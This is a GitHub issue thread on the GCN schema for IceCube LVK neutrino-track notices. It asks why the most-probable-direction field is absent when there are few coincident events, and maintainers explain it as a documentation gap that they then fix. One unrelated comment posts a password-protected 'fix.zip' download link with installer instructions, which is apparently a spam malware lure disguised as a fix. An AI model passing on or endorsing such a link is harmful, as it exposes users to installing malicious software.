### ISSUE TITLE
Most probable direction in LVK Nu Track search notices not present in the case of only 1 coincident event

### ISSUE THREAD

**Issue by aleberti** [nasa-gcn/gcn-schema#189]
According to the LVK Nu Track Search schema and example, https://github.com/nasa-gcn/gcn-schema/blob/v4.1.0/gcn/notices/icecube/lvk_nu_track_search.schema.json and https://github.com/nasa-gcn/gcn-schema/blob/v4.1.0/gcn/notices/icecube/lvk_nu_track_search.example.json, if there are coincident events there will be a field called `most_probable_direction` giving the most probable RA and Dec for the event(s). From the schema and the example, it seems that this field would be present even if one coincident event is found. However, it is not the case. As an example, there was an event a few days ago with one coincident event only: https://roc.icecube.wisc.edu/public/LvkNuTrackSearch/output/S240824f-1-Preliminary_collected_results.json . The field `most_probable_direction` field is not there.

It would be nice if either the documentation of the schema warns about this feature (I cannot say if it a bug, or a wanted feature), or to add the field (possibly with the same coordinates as the only coincident event) also in the case of only one coincident event. Possibly the latter seems to be logically more robust, from my point of view. In this way people programming the parsing of the notices know what they should do in that specific case. As they are now, the schema and the example do not allow to know a priori what would happen in this corner case.

Also, unrelated, the LVK Nu Track Search notices still refer to v0.4.0 of the schema, instead of v0.4.1 (see e.g. https://roc.icecube.wisc.edu/public/LvkNuTrackSearch/output/S240826aq-2-Preliminary_collected_results.json, i.e. the latest notice sent on that stream). Not sure it is also wanted or not.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lpsinger** [comment]
CC @blaufuss.

**Comment by aleberti** [comment]
Last night there was another alert which seems not to follow the example, this time with 2 coincident events: https://roc.icecube.wisc.edu/public/LvkNuTrackSearch/output/S240907dm-1-Preliminary_collected_results.json and https://roc.icecube.wisc.edu/public/LvkNuTrackSearch/output/S240907dm-2-Preliminary_collected_results.json . Even with 2 coincident events, no `most_probable_direction` field was present.

**Comment by blaufuss** [comment]
Copying in @jessiethw who's helping address this.

hi @aleberti thanks for the report.  This is a documentation issue, and we're working on an update to the docs.  

Short explanation:  we have 2 searches running, the generic likelihood search, which is capable of returning a best fit direction in the way it's run.  The bayesian search looks at the joint probability of neutrinos and GW being of common origin.  It can return the probability of both neutrinos being from the same GW event, but it does not try to make an overall best fit direction between all three.  

Only the bayesian search is applied to the significant=False GW alerts (as these two cases are), so this most_probable_direction isn't available.  

PR against the docs in preparation.

As best I understand, the IceCube schema did not change from version 0.4.0 to 0.4.1 so validating against either should be fine.  

Thanks for the input, and reach out if we can help clear anything else up.

**Comment by blaufuss** [comment]
Docs updated per mentioned PR.
